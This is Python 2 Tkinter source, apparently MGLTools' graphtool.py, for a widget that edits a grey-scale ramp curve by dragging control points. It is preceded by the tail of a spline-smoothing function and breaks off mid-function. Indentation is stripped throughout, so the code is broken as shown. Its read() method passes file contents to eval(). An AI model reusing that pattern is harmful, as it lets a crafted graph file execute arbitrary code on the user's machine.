0.500*xy[-3] + 0.500*xy[1],
0.167*xy[-4] + 0.833*xy[0],
0.167*xy[-3] + 0.833*xy[1],
0.833*xy[0] + 0.167*xy[2],
0.833*xy[1] + 0.167*xy[3],
0.500*xy[0] + 0.500*xy[2],
0.500*xy[1] + 0.500*xy[3],
)
out = [control[0], control[1]]
self.addcurve(out, control, steps)
else:
out = [xy[0], xy[1]]
for i in range(0, len(xy)-4, 2):
if i == 0 and not closed:
control = (xy[i],xy[i+1],0.333*xy[i] + 0.667*xy[i+2],0.333*xy[i+1] + 0.667*xy[i+3],)
else:
control = (
0.500*xy[i] + 0.500*xy[i+2],
0.500*xy[i+1] + 0.500*xy[i+3],
0.167*xy[i] + 0.833*xy[i+2],
0.167*xy[i+1] + 0.833*xy[i+3],
)
if i == len(xy)-6 and not closed:
control = control + (
0.667*xy[i+2] + 0.333*xy[i+4],
0.667*xy[i+3] + 0.333*xy[i+5],
xy[i+4],
xy[i+5],
)
else:
control = control + (
0.833*xy[i+2] + 0.167*xy[i+4],
0.833*xy[i+3] + 0.167*xy[i+5],
0.500*xy[i+2] + 0.500*xy[i+4],
0.500*xy[i+3] + 0.500*xy[i+5],
)
if ((xy[i] == xy[i+2] and xy[i+1] == xy[i+3]) or
(xy[i+2] == xy[i+4] and xy[i+3] == xy[i+5])):
out.append(control[6])
out.append(control[7])
else:
self.addcurve(out, control, steps)
return out
|
## Automatically adapted for numpy.oldnumeric Jul 23, 2007 by
##############################################################################
#
#
# Authors: <NAME>,<NAME>
#
#
###############################################################################
#
#
#
#
#$Id: graphtool.py,v 1.47 2007/12/04 21:28:04 vareille Exp $
#Graph Tool is a widget with movable graph curve
#app=GraphApp(root)
#app.caluculate_ramp() returns current ramp
#from ViewerFramework.VFCommand import Command, CommandGUI
from Tkinter import *
import Tkinter
import tkFileDialog
import types,os
from mglutil.util.callback import CallBackFunction
from mglutil.util.callback import CallbackManager
from mglutil.util.misc import ensureFontCase
import numpy.oldnumeric as Numeric
from mglutil.gui.BasicWidgets.Tk.thumbwheel import ThumbWheel
import Pmw
from Pmw import *
from mglutil.util.misc import deepCopySeq
class GraphApp:
# Initialization
def __init__(self,master=None,callback=None,continuous=1):
self.master=master
self.callback = None
self.callbacks = CallbackManager()
self.canvas=canvas = Canvas(self.master,width=345,height=320,bg='white')
self.toolbar = Frame(master) # Create Toolbar
self.toolbar.pack(side='top', expand=1, fill='both')
self.menuFrame1 = Tkinter.Frame(self.toolbar, relief='raised', borderwidth=3)
self.menuFrame1.pack(side='top', expand=1, fill='x')
self.filebutton = Tkinter.Menubutton(self.menuFrame1, text='File')
self.filebutton.pack(side='left')
self.filemenu = Tkinter.Menu(self.filebutton, {})
self.filemenu.add_command(label='Read', command=self.read_cb)
self.filemenu.add_command(label='Write', command=self.write_cb)
self.filebutton['menu'] = self.filemenu
self.editbutton = Tkinter.Menubutton(self.menuFrame1, text='Edit')
self.editbutton.pack(side='left', anchor='w')
self.editmenu = Tkinter.Menu(self.editbutton, {})
self.editmenu.add_command(label='Reset to first in history', command=self.resetAll_cb)
self.editmenu.add_command(label='Step back in history loop', command=self.stepBack_cb)
self.editmenu.add_command(label='Default Curve', command=self.defaultcurve_cb)
self.editmenu.add_command(label='Invert Curve',command=self.invertGraph)
self.histvar=IntVar()
self.histvar.set(1)
self.editmenu.add_checkbutton(label='Histogram',var=self.histvar,command=self.drawHistogram)
self.editbutton['menu'] = self.editmenu
self.optionType = IntVar()
self.updatebutton = Tkinter.Menubutton(self.menuFrame1, text='Update')
self.updatebutton.pack(side='left', anchor='w')
self.updatemenu = Tkinter.Menu(self.updatebutton,{} )
for v,s in {0:'Continuous',1:'MouseButtonUp',2:'Update'}.items():
self.updatemenu.add_radiobutton(label=s,
var=self.optionType,
value = v,command=self.calloption)
if continuous==1:
self.optionType.set(0)
self.updatebutton['menu'] = self.updatemenu
#Curve Type
self.CurveType = IntVar()
self.CurveType.set(0)
self.Smooth=1
self.curvebutton = Tkinter.Menubutton(self.menuFrame1, text='Curve')
self.curvebutton.pack(side='left', anchor='w')
self.curvemenu = Tkinter.Menu(self.curvebutton,{} )
for v,s in {0:'Smooth',1:'Freehand'}.items():
self.curvemenu.add_radiobutton(label=s,
var=self.CurveType,
value = v,command=self.curveoption)
self.curvebutton['menu'] = self.curvemenu
f1 = Tkinter.Frame(self.master)
f1.pack(side='bottom', fill='both', expand=1)
self.d1scalewheellab=Label(f1,text="Sensitivity")
self.d1scalewheellab.pack(side="left")
self.d1scalewheel=ThumbWheel(width=100, height=26,wheelPad=4,master=f1,labcfg={'fg':'black', 'side':'left', 'text':'Test:'},wheelLabcfg1={'font':(ensureFontCase('times'),14,'bold')},wheelLabcfg2={'font':(ensureFontCase('times'),14,'bold')},canvascfg={'bg':'blue'},min = 0.0,max = 1.0,precision =4,showlabel =0,value =0.013,continuous =0,oneTurn =0.01,size = 200)
self.d1scalewheel.pack(side="left")
#tooltip
self.balloon = Pmw.Balloon(f1)
self.balloon.bind(self.d1scalewheel,"cutoff value for differences in Z xoordinates,small values generate more contours")
self.Updatebutton=Button(f1,text=' Update ',command=self.Update)
self.Updatebutton.pack(side=LEFT)
self.Quitbutton=Button(f1,text=' Dismiss ',command=self.dismiss_cb)
self.Quitbutton.pack(side=RIGHT)
self.canvas.bind("<Button-1>", self.OnCanvasClicked)
self.canvas.bind("<B1-Motion>", self.OnCanvasMouseDrag)
self.canvas.bind("<ButtonRelease-1>", self.OnCanvasMouseUp)
self.canvas.config(closeenough=2.0)
self.canvas.pack(side=BOTTOM, fill=BOTH,expand=1)
self.startpoint=(px,py)=(50,275)
self.endpoint=(px1,py1)=(305,20)
self.newpoints=[(px,py),(px1,py1)]
self.canvas.create_rectangle([(px-1,py),(px1+1,py1)],fill='white',outline="black",width=1)
self.canvas.create_text(46,281,text=0,anchor=N)
#Drawing Graph Sheet
for i in range(1,6):
x=50+i*50
canvas.create_line(x,280,x,275,width=1)
canvas.create_text(x,281,text='%d' %(50*i),anchor=N)
for i in range(1,5):
x=50+i*50
canvas.create_line(x,275,x,20,width=1,fill="gray80")
for i in range(1,6):
y=275-i*50
canvas.create_line(45,y,50,y,width=1)
canvas.create_text(44,y,text='%d' %(50*i),anchor=E)
for i in range(1,5):
y=275-i*50
canvas.create_line(50,y,305,y,width=1,fill="gray80")
(x,y)=self.newpoints[0]
(x1,y1)=self.newpoints[-1]
self.curline=canvas.create_line(self.newpoints,fill='black',width=1)
#GRAY SCALE
grays=[]
for i in range(0,100,1):
grays.append("gray"+"%d" %i)
#grays.reverse()
#bottom one
x1=48
x2=51
self.canvas.create_rectangle([(50,315),(307,300)],fill='white',outline="black",width=0.5)
for a in grays:
if x1>306:
x1=x2=306
self.canvas.create_rectangle([(x1+2.5,314),(x2+2.5,301)],fill=a,outline=a,width=1)
x1=x1+2.5
x2=x2+2.5
#left one
y1=274
y2=271
self.canvas.create_rectangle([(20,275),(5,20)],fill='black',outline="black",width=0.5)
for a in grays:
if y1>275:
y1=y2=275
self.canvas.create_rectangle([(19,y1-2.5),(6,y2-2.5)],fill=a,outline=a,width=1)
y1=y1-2.5
y2=y2-2.5
self.oldpoints=[]
self.canvas.configure(cursor='cross')
self.curovals=[]
self.default_points=[(50,275),(88, 238), (101, 150), (154, 78), (75, 271),(305,20)]
# now set the constructor options correctly using the configure method
apply( self.configure, (),{'callback':callback,'continuous':continuous})
self.continuous=continuous
self.mousebuttonup=0
self.update=0
self.range_points=[]
self.history=[]
self.bars=[]
self.default_ramp=[]
self.histvalues=[]
def calloption(self):
tag=self.optionType.get()
self.continuous=0
self.mousebuttonup=0
self.update=0
if tag==0:
self.continuous=1
elif tag==1:
self.mousebuttonup=1
elif tag==2:
self.update=1
def curveoption(self):
tag=self.CurveType.get()
self.Smooth=0
self.Freehand=0
if tag==0:
self.Smooth=1
self.canvas.delete(self.curline)
self.curline=self.canvas.create_line(self.getControlPoints(),smooth=1)
elif tag==1:
self.Freehand=1
self.canvas.delete(self.curline)
self.curline=self.canvas.create_line(self.getControlPoints())
def OnCanvasClicked(self,event):
"""Appends last drag point to controlpoint list if not appended by mouseleave func.
when clicked on any controlpoint removes control point and draws line with remaining
control points."""
self.CLICK_NODRAG=1
if self.history!=[]:
if self.history[-1][1]!=self.d1scalewheel.get():
self.history[-1]=(self.history[-1][0],self.d1scalewheel.get())
if hasattr(self,"curx"):
if (self.curx,self.cury) :#not in [self.startpoint,self.endpoint]:
(self.ox,self.oy)=(self.curx,self.cury)
if (self.ox,self.oy) not in self.oldpoints:
self.oldpoints.append((self.ox,self.oy))
if hasattr(self,"curoval"):
self.curovals.append(self.curoval)
self.OrgX=event.x
self.OrgY=event.y
CtlPoints=[]
xcoords=[]
ycoords=[]
#Limiting points not to cross
self.limit_xcoord=[]
for i in range(0,10):
xcoords.append(self.OrgX-i)
ycoords.append(self.OrgY-i)
xcoords.append(self.OrgX+i)
ycoords.append(self.OrgY+i)
if xcoords!=[] and ycoords!=[]:
for x in xcoords:
for y in ycoords:
CtlPoints.append((x,y))
self.range_points=self.oldpoints
self.range_points.sort()
for c in CtlPoints:
if c in self.range_points:
index_c=self.range_points.index(c)
if index_c<len(self.range_points)-1:
self.limit_xcoord.append(self.range_points[index_c+1])
if index_c>0:
self.limit_xcoord.append(self.range_points[index_c-1])
return
else:
self.limit_xcoord.append(self.startpoint)
return
elif index_c==len(self.range_points)-1:
self.limit_xcoord.append(self.range_points[index_c-1])
self.limit_xcoord.append(self.endpoint)
return
self.newd1ramp= self.caluculate_ramp()
def OnCanvasMouseUp(self,event):
CtlPoints=[]
xcoords=[]
ycoords=[]
if hasattr(self,"curx"):
(self.ox,self.oy)=(self.curx,self.cury)
if (self.ox,self.oy) not in self.oldpoints :#not in [self.startpoint,self.endpoint] :
self.oldpoints.append((self.ox,self.oy))
if hasattr(self,"curoval"):
if self.curoval not in self.curovals:
self.curovals.append(self.curoval)
if self.CLICK_NODRAG==1:
#finding out points around the selected point
for i in range(0,10):
xcoords.append(self.OrgX-i)
ycoords.append(self.OrgY-i)
xcoords.append(self.OrgX+i)
ycoords.append(self.OrgY+i)
if xcoords!=[] and ycoords!=[]:
for x in xcoords:
for y in ycoords:
CtlPoints.append((x,y))
for c in CtlPoints:
if c in self.oldpoints:
ind=self.oldpoints.index(c)
op=self.oldpoints[ind]
if ind>0:
prev_oldpoint=self.oldpoints[ind-1]
else:
prev_oldpoint=self.endpoint
del self.oldpoints[ind]
for co in self.curovals:
ov_point1=self.canvas.coords(co)
if len(ov_point1)!=0:
ov_point=(int(ov_point1[0]+2),int(ov_point1[1]+2))
if ov_point==c and ov_point not in [self.startpoint,self.endpoint]:
self.canvas.delete(co)
self.curovals.remove(co)
if hasattr(self,"curx"):
if ov_point==(self.curx,self.cury):
(self.curx,self.cury)=prev_oldpoint
self.draw()
if self.mousebuttonup:
self.newd1ramp=self.caluculate_ramp()
self.callbacks.CallCallbacks(self.newd1ramp)
self.history.append((deepCopySeq(self.oldpoints),self.d1scalewheel.get()))
def OnCanvasMouseDrag(self,event):
self.CLICK_NODRAG=0
CtlPoints=[]
xcoords=[]
ycoords=[]
#making active clickrange to be ten points around clicked point
for i in range(0,10):
xcoords.append(self.OrgX-i)
ycoords.append(self.OrgY-i)
xcoords.append(self.OrgX+i)
ycoords.append(self.OrgY+i)
if xcoords!=[] and ycoords!=[]:
for x in xcoords:
for y in ycoords:
CtlPoints.append((x,y))
for c in CtlPoints:
if c in self.oldpoints:
ind=self.oldpoints.index(c)
op=self.oldpoints[ind]
del self.oldpoints[ind]
for co in self.curovals:
ov_point1=self.canvas.coords(co)
if len(ov_point1)!=0:
ov_point=(int(round(ov_point1[0],3))+2,int(round(ov_point1[1],3))+2)
if ov_point==c :
self.canvas.delete(co)
self.curovals.remove(co)
self.curx=dx=event.x
self.cury=dy=event.y
self.draw()
def draw(self):
"""Draws line,ovals with current controlpoints. """
new1points=[]
curve_points=[]
self.smoothened_points=[]
if self.CLICK_NODRAG==0:
dx=self.curx
dy=self.cury
else:
(dx,dy)=(self.curx,self.cury)=(self.endpoint)
###Limiting xcoords of the current point not to cross adjacent points
if hasattr(self,"limit_xcoord"):
if self.limit_xcoord!=[]:
self.limit_xcoord.sort()
if (self.curx,self.cury) not in [self.startpoint,self.endpoint]:
if (self.curx,self.cury)< self.limit_xcoord[0]:
if self.curx<=self.limit_xcoord[0][0] and self.cury<self.limit_xcoord[0][1]:
dx=self.curx=self.limit_xcoord[0][0]+1
if self.curx<=self.limit_xcoord[0][0] and self.cury>self.limit_xcoord[0][1]:
dx=self.curx=self.limit_xcoord[0][0]
if (self.curx,self.cury)> self.limit_xcoord[1]:
if self.curx>=self.limit_xcoord[1][0] and self.cury>self.limit_xcoord[1][1]:
dx=self.curx=self.limit_xcoord[1][0]-1
if self.curx>=self.limit_xcoord[1][0] and self.cury<self.limit_xcoord[1][1]:
dx=self.curx=self.limit_xcoord[1][0]
#Limit graph with in the axis
if self.curx not in range(50,305):
if self.curx<50:
self.curx=dx=50
else:
self.curx=dx=305
if self.cury not in range(20,275):
if self.cury<20:
self.cury=dy=20
else:
self.cury=dy=275
#adding start,end points
new1points.append(self.startpoint)
new1points.append(self.endpoint)
#adding current point to list
if (dx,dy) not in new1points and (dx,dy) not in [self.startpoint,self.endpoint]:
new1points.append((dx,dy))
#adding oldpoints to list
if hasattr(self,"ox"):
for op in self.oldpoints:
if op not in new1points:
new1points.append(op)
new1points.sort()
#removing oval point that is on drag
if hasattr(self,"curoval"):
if self.curoval not in self.curovals:
self.canvas.delete(self.curoval)
self.canvas.delete(self.curline)
#if points that start with 50 or 51 or 305,304 other than start ,end
#points exists remove start or end points
#remove ovals
#finding oval for start point and endpoint
for i in new1points:
if i[0]==51 or i[0]==50:
if i!=self.startpoint:
if self.startpoint in new1points:
new1points.remove(self.startpoint)
###removing start point oval
x = 50
y = 275
st_oval_1= self.canvas.find_enclosed(x-3,y-3,x+3,y+3)
if st_oval_1:
for so in st_oval_1:
if so!=[]:
st_oval=so
st_oval_coords=self.canvas.coords(st_oval)
if (int(st_oval_coords[0]+2),int(st_oval_coords[1]+2))==self.startpoint:
self.canvas.delete(st_oval)
if st_oval in self.curovals:
self.curovals.remove(st_oval)
for i in new1points:
if i[0]==304 or i[0]==305:
if i!=self.endpoint :
if self.endpoint in new1points:
new1points.remove(self.endpoint)
###removing end point oval
x = 305
y = 20
end_oval_1= self.canvas.find_enclosed(x-3,y-3,x+3,y+3)
if end_oval_1:
for eo in end_oval_1:
if eo!=[]:
end_oval=eo
end_oval_coords=self.canvas.coords(end_oval)
if (int(end_oval_coords[0]+2),int(end_oval_coords[1]+2))==self.endpoint:
self.canvas.delete(end_oval)
if end_oval in self.curovals:
self.curovals.remove(end_oval)
new1points.sort()
for (x,y) in new1points:
curve_points.append(x)
curve_points.append(y)
self.smoothened_points= self.smooth(curve_points)
#drawing line
if len(self.smoothened_points)>2:
if self.Smooth:
self.curline=self.canvas.create_line(self.smoothened_points)
else:
self.curline=self.canvas.create_line(curve_points)
else:
if curve_points[0]==50 or 51:
if self.Smooth:
self.curline=self.canvas.create_line(curve_points,smooth=1)
else:
self.curline=self.canvas.create_line(curve_points)
else:
self.curline=self.canvas.create_line(self.startpoint,self.endpoint)
##Adding oval when start or end point in new1points
coval_coords=[]
for i in self.curovals:
coval_coords.append(self.canvas.coords(i))
if self.endpoint in new1points:
co=self.canvas.create_oval(self.endpoint[0]-2,self.endpoint[-1]-2,self.endpoint[0]+2,self.endpoint[-1]+2,width=1,outline='black',fill='black')
endco_coords =self.canvas.coords(co)
if endco_coords not in coval_coords:
self.curovals.append(co)
if self.startpoint in new1points:
co=self.canvas.create_oval(self.startpoint[0]-2,self.startpoint[-1]-2,self.startpoint[0]+2,self.startpoint[-1]+2,width=1,outline='black',fill='black')
startco_coords=self.canvas.coords(co)
if startco_coords not in coval_coords:
self.curovals.append(co)
#drawing ovals
if (self.curx,self.cury)!=self.endpoint:
self.curoval=self.canvas.create_oval(self.curx-2,self.cury-2,self.curx+2,self.cury+2,width=1,outline='black',fill='black')
if (self.curx,self.cury)==self.endpoint and self.endpoint in new1points:
self.curoval=self.canvas.create_oval(self.curx-2,self.cury-2,self.curx+2,self.cury+2,width=1,outline='black',fill='black')
self.newd1ramp= self.caluculate_ramp()
if self.continuous:
self.callbacks.CallCallbacks(self.newd1ramp)
######## convert coordinates to ramp##################
def caluculate_ramp(self):
"""
"""
dramp=[]
mypoints=[]
mynewpoints=[]
self.oldpoints.sort()
calcpoints=[]
#if self.continuous :
if hasattr(self,"curx"):
if (self.curx,self.cury) not in self.oldpoints and (self.curx,self.cury) not in [self.startpoint,self.endpoint]:
calcpoints.append((self.curx,self.cury))
if len(self.oldpoints)!=0:
for o in self.oldpoints:
if o not in calcpoints:
calcpoints.append(o)
if self.startpoint not in calcpoints:
calcpoints.append(self.startpoint)
if self.endpoint not in calcpoints:
calcpoints.append(self.endpoint)
calcpoints.sort()
length=len(calcpoints)
for l in range(length):
if l+1<=length-1:
mypoints=[calcpoints[l],calcpoints[l+1]]
if calcpoints[l] not in mynewpoints:
mynewpoints.append( calcpoints[l])
(x1,y1)=calcpoints[l]
(x2,y2)=calcpoints[l+1]
if x1>x2:
dcx=x1-x2
px=x1-1
else:
dcx=x2-x1
px=x1+1
if y1>y2:
dcy=y1-y2
if dcx>=1:
py=y1-float(dcy)/float(dcx)
else:
py=y1
else:
dcy=y2-y1
if dcx>=1:
py=y1+float(dcy)/float(dcx)
else:
py=y2
mynewpoints.append( (px,int(round(py))))
for dc in range(dcx-1):
if x1>x2:
px=px-1
else:
px=px+1
if y1>y2:
if dcx>=1:
py=py-float(dcy)/float(dcx)
else:
py=y1
else:
if dcx>=1:
py=py+float(dcy)/float(dcx)
else:
py=y2
mynewpoints.append( (px,int(round(py))))
ramp=[]
for r in mynewpoints:
#scale
ra=float(275-r[1])
if ra>=256:
ra=255.0
ramp.append(ra)
dramp=Numeric.array(ramp,'f')
if len(dramp)!=0:
return dramp
else:
dramp=Numeric.arange(0,256,1,'f')
return dramp
def get(self):
if hasattr(self,"newd1ramp"):
return self.newd1ramp
else:
return self.caluculate_ramp()
def configure(self, **kw):
if 'type' in kw.keys(): # make sure type is set first
self.setType(kw['type'])
del kw['type']
for key,value in kw.items():
if key=='callback':
self.setCallbacks(value)
def setCallbacks(self, cb):
"""Set widget callback. Must be callable function. Callback is called
every time the widget value is set/modified"""
assert cb is None or callable(cb) or type(cb) is types.ListType,\
"Illegal callback: must be either None or callable. Got %s"%cb
if cb is None: return
elif type(cb) is types.ListType:
for func in cb:
assert callable(func), "Illegal callback must be callable. Got %s"%func
self.callbacks.AddCallback(func)
else:
self.callbacks.AddCallback(cb)
self.callback = cb
def invertGraph(self):
"""This function is for inverting graph by reverse computing controlpoints"""
if self.history!=[]:
if self.history[-1][1]!=self.d1scalewheel.get():
self.history[-1]=(self.history[-1][0],self.d1scalewheel.get())
invert_points=[]
#self.oldpoints=[]
points=self.getControlPoints()
if len(points)<2:
points=[self.startpoint,self.endpoint]
for p in points:
if p[1] in range(20,276):
y=275 -(p[1]-20)
invert_points.append((p[0],y))
self.reset()
###################################################
#Some times start and end points are not deleted
#So for deleting them canvas.find_enclosed points at
#startpoint and endpoint are caluculated(returns alist of
#canvas objects present there) and if the coords of
#any canvas objects matches with start or end point that gets deleted
#####################################################
x = 50
y = 275
st_oval_1= self.canvas.find_enclosed(x-3,y-3,x+3,y+3)
if st_oval_1:
for so in st_oval_1:
if so!=[]:
st_oval=so
st_oval_coords=self.canvas.coords(st_oval)
if (int(st_oval_coords[0]+2),int(st_oval_coords[1]+2))==self.startpoint:
self.canvas.delete(st_oval)
if st_oval in self.curovals:
self.curovals.remove(st_oval)
x = 305
y = 20
end_oval_1= self.canvas.find_enclosed(x-3,y-3,x+3,y+3)
if end_oval_1:
for eo in end_oval_1:
if eo!=[]:
end_oval=eo
end_oval_coords=self.canvas.coords(end_oval)
if (int(end_oval_coords[0]+2),int(end_oval_coords[1]+2))==self.endpoint:
self.canvas.delete(end_oval)
if end_oval in self.curovals:
self.curovals.remove(end_oval)
self.canvas.delete(self.curline)
if self.Smooth:
self.curline=self.canvas.create_line(invert_points,smooth=1)
else:
self.curline=self.canvas.create_line(invert_points)
self.oldpoints=invert_points
for p in invert_points:
self.curoval=self.canvas.create_oval(p[0]-2,p[1]-2,p[0]+2,p[1]+2,width=1,outline='black',fill='black')
self.curovals.append(self.curoval)
(self.curx,self.cury) =invert_points[-2]
if self.continuous or self.mousebuttonup:
self.newd1ramp=self.caluculate_ramp()
self.callbacks.CallCallbacks([self.newd1ramp])
self.history.append((deepCopySeq(self.oldpoints),self.d1scalewheel.get()))
def defaultcurve_cb(self):
"""draws curve with default points"""
if self.history!=[]:
if self.history[-1][1]!=self.d1scalewheel.get():
self.history[-1]=(self.history[-1][0],self.d1scalewheel.get())
points=[]
self.default_points=[]
self.oldpoints=[]
self.d1scalewheel.set(0.013)
self.default_points=[(50,275),(88, 238), (101, 150), (154, 78), (75, 271),(305,20)]
self.reset()
self.canvas.delete(self.curline)
self.default_points.sort()
if self.Smooth:
self.curline=self.canvas.create_line(self.default_points,smooth=1)
else:
self.curline=self.canvas.create_line(self.default_points)
self.oldpoints=self.default_points
for p in self.default_points:
self.curoval=self.canvas.create_oval(p[0]-2,p[1]-2,p[0]+2,p[1]+2,width=1,outline='black',fill='black')
self.curovals.append(self.curoval)
(self.curx,self.cury) =self.default_points[-2]
if self.continuous or self.mousebuttonup:
self.newd1ramp=self.caluculate_ramp()
self.callbacks.CallCallbacks(self.newd1ramp)
self.history.append((deepCopySeq(self.oldpoints),self.d1scalewheel.get()))
self.default_ramp= self.newd1ramp
def read_cb(self):
fileTypes = [("Graph",'*_Graph.py'), ("any file",'*.*')]
fileBrowserTitle = "Read Graph"
fileName = self.fileOpenAsk(types=fileTypes,
title=fileBrowserTitle)
if not fileName:
return
self.read(fileName)
def read( self,fileName):
if self.history!=[]:
if self.history[-1][1]!=self.d1scalewheel.get():
self.history[-1]=(self.history[-1][0],self.d1scalewheel.get())
fptr=open(fileName,"r")
data=fptr.readlines()
cpoints=data[0][:-1]
sensitivity=data[1]
self.d1scalewheel.set(eval(sensitivity))
if len(cpoints)==0:
return
else:
points=cpoints
self.oldpoints=[]
self.reset()
if hasattr(self,"curline"):
self.canvas.delete(self.curline)
for c in self.curovals:
self.canvas.delete(c)
self.curovals.remove(c)
if hasattr(self,"curoval"):
self.canvas.delete(self.curoval)
self.curovals=[]
if self.Smooth:
self.curline=self.canvas.create_line(eval(points),smooth=1)
else:
self.curline=self.canvas.create_line(eval(points))
self.readpoints=self.oldpoints=eval(points)[1:-1]
for p in eval(points)[1:-1]:
self.curoval=self.canvas.create_oval(p[0]-2,p[1]-2,p[0]+2,p[1]+2,width=1,outline='black',fill='black')
self.curovals.append(self.curoval)
(self.curx,self.cury) =eval(points)[-2]
self.history.append((deepCopySeq(self.oldpoints),self.d1scalewheel.get()))
def fileOpenAsk(self, idir=None, ifile=None, types=None,
title='Open'):
if types==None: types = [ ('All files', '*') ]
file = tkFileDialog.askopenfilename( filetypes=types,
initialdir=idir,
initialfile=ifile,
title=title)
if file=='': file = None
return file
def write_cb(self):
fileTypes = [("Graph",'*_Graph.py'), ("any file",'*.*')]
fileBrowserTitle = "Write Graph"
fileName = self.fileSaveAsk(types=fileTypes,
title=fileBrowserTitle)
if not fileName:
return
self.write(fileName)
def write(self,fileName):
fptr=open(fileName,"w")
points= self.getControlPoints()
points.sort()
fptr.write(str(points))
fptr.write("\n")
fptr.write(str(self.d1scalewheel.get()))
fptr.close()
def fileSaveAsk(self, idir=None, ifile=None, types = None,
title='Save'):
if types==None: types = [ ('All files', '*') ]
file = tkFileDialog.asksaveasfilename( filetypes=types,
initialdir=idir,
initialfile=ifile,
title=title)
if file=='': file = None
return file
def reset(self):
"""This function deletes current line removes current ovals"""
self.canvas.delete(self.curline)
self.oldpoints=[]
for c in self.curovals:
self.canvas.delete(c)
if hasattr(self,"curoval"):
self.canvas.delete(self.curoval)
self.curovals=[]
if hasattr(self,"curoval"):
delattr(self,"curoval")
if hasattr(self,"curx"):
delattr(self,"curx")
def resetAll_cb(self):
"""Resetting curve as slant line 0 to 255"""
self.reset()
self.curline=self.canvas.create_line([self.startpoint,self.endpoint],width=1,fill='black')
for p in [self.startpoint,self.endpoint]:
self.curoval=self.canvas.create_oval(p[0]-2,p[1]-2,p[0]+2,p[1]+2,width=1,outline='black',fill='black')
self.curovals.append(self.curoval)
self.oldpoints=[self.startpoint,self.endpoint]
(self.curx,self.cury)=self.endpoint
self.d1scalewheel.set(0.013)
if self.continuous or self.mousebuttonup:
self.newd1ramp=Numeric.arange(0,256,1,'f')
self.callbacks.CallCallbacks(self.newd1ramp)
#self.histvar.set(0)
self.history=[]
def stepBack_cb(self):
"""when stepBack button clicked previous step is displayed.History of
all the steps done is remembered and when stepback clicked from history
list previous step is shown and that step is removed from history list """
if self.history!=[]:
if len(self.history)==1:
self.resetAll_cb()
else:
del self.history[-1]
pns = self.history[-1][0]
#deleting
self.oldpoints=pns
self.canvas.delete(self.curline)
for c in self.curovals:
self.canvas.delete(c)
if hasattr(self,"curoval"):
self.canvas.delete(self.curoval)
self.curovals=[]
###################################################
#Some times start and end points are not deleted
#So for deleting them canvas.find_enclosed points at
#startpoint and endpoint are caluculated(returns alist of
#canvas objects present there) and if the coords of
#any canvas objects matches with start or end point that gets deleted
#####################################################
x = 50
y = 275
st_oval_1= self.canvas.find_enclosed(x-3,y-3,x+3,y+3)
if st_oval_1:
for so in st_oval_1:
if so!=[]:
st_oval=so
st_oval_coords=self.canvas.coords(st_oval)
if (int(st_oval_coords[0]+2),int(st_oval_coords[1]+2))==self.startpoint:
self.canvas.delete(st_oval)
if st_oval in self.curovals:
self.curovals.remove(st_oval)
x = 305
y = 20
end_oval_1= self.canvas.find_enclosed(x-3,y-3,x+3,y+3)
if end_oval_1:
for eo in end_oval_1:
if eo!=[]:
end_oval=eo
end_oval_coords=self.canvas.coords(end_oval)
if (int(end_oval_coords[0]+2),int(end_oval_coords[1]+2))==self.endpoint:
self.canvas.delete(end_oval)
if end_oval in self.curovals:
self.curovals.remove(end_oval)
pns.sort()
#if no start or end points
if pns[0][0]>51 :
pns.insert(0,self.startpoint)
l=len(pns)
if pns[-1][0]<304:
pns.insert(l,self.endpoint)
#if start or endpoints and points with (50or 51) or (305or305)
if self.startpoint in pns:
for p in pns:
if p!=self.startpoint:
if p[0]== 50 or p[0]==51:
pns.remove(self.startpoint)
if self.endpoint in pns:
for p in pns:
if p!=self.endpoint:
if p[0]==305 or p[0]==304:
pns.remove(self.endpoint)
print pns
if self.Smooth:
self.curline=self.canvas.create_line(pns,width=1,fill='black',smooth=1)
else:
self.curline=self.canvas.create_line(pns,width=1,fill='black')
for p in pns:
self.curoval=self.canvas.create_oval(p[0]-2,p[1]-2,p[0]+2,p[1]+2,width=1,outline='black',fill='black')
self.curovals.append(self.curoval)
self.d1scalewheel.set(self.history[-1][1])
if self.continuous or self.mousebuttonup:
self.newd1ramp=Numeric.arange(0,256,1,'f')
self.callbacks.CallCallbacks(self.newd1ramp)
(self.curx,self.cury)=self.endpoint
def getControlPoints(self):
"""fuction to get current control points of the curve"""
if not self.oldpoints==[self.startpoint,self.endpoint]:
for i in range(len(self.oldpoints)):
if self.startpoint in self.oldpoints:
self.oldpoints.remove(self.startpoint)
if self.endpoint in self.oldpoints:
self.oldpoints.remove(self.endpoint)
self.controlpoints=[]
if hasattr(self,"curoval"):
c=self.canvas.coords(self.curoval)
if len(c)!=0:
if (int(c[0]+2),int(c[1]+2)) not in self.oldpoints and (int(c[0]+2),int(c[1]+2)) not in [self.startpoint,self.endpoint]:
self.controlpoints.append((int(c[0]+2),int(c[1]+2)))
for op in self.oldpoints:
self.controlpoints.append(op)
self.controlpoints.sort()
if len(self.controlpoints)>0:
if self.controlpoints[0][0]==50 or self.controlpoints[0][0]==51 :
pass
else:
self.controlpoints.append(self.startpoint)
self.controlpoints.sort()
if self.controlpoints[-1][0]==305 or self.controlpoints[-1][0]==304:
pass
else:
self.controlpoints.append(self.endpoint)
self.controlpoints.sort()
return self.controlpoints
def setControlPoints(self,points):
"""function to set curve control points"""
assert isinstance(points, types.ListType),"Illegal type for points"
for (x,y) in points:
assert x in range(50,306),"coordinates are out of range,x should be in [50,305]"
assert y in range(20,276),"coordinates are out of range,y should be in [20,275]"
self.oldpoints=[]
self.controlpoints=[]
self.reset()
self.oldpoints=self.controlpoints=points
self.controlpoints.sort()
if self.controlpoints[0]!=self.startpoint:
self.controlpoints.append(self.startpoint)
if self.controlpoints[-1]!=self.endpoint:
self.controlpoints.append(self.endpoint)
self.canvas.delete(self.curline)
self.controlpoints.sort()
if self.Smooth:
self.curline=self.canvas.create_line( self.controlpoints,smooth=1)
else:
self.curline=self.canvas.create_line( self.controlpoints)
for p in self.controlpoints[1:-1]:
self.curoval=self.canvas.create_oval(p[0]-2,p[1]-2,p[0]+2,p[1]+2,width=1,outline='black',fill='black')
self.curovals.append(self.curoval)
(self.curx,self.cury)= self.controlpoints[-2]
self.history.append((deepCopySeq(self.oldpoints),self.d1scalewheel.get()))
if self.continuous or self.mousebuttonup:
self.newd1ramp=self.caluculate_ramp()
self.callbacks.CallCallbacks(self.newd1ramp)
def setSensitivity(self,val):
self.d1scalewheel.set(val)
def Update(self):
if self.update==1:
dramp=self.caluculate_ramp()
self.newd1ramp=dramp
self.callbacks.CallCallbacks(dramp)
def dismiss_cb(self):
try:
if self.master.winfo_ismapped():
self.master.withdraw()
except:
if self.master.master.winfo_ismapped():
self.master.master.withdraw()
#draw Histogram
def removeHistogram(self):
"""removes Histograms"""
for b in self.bars:
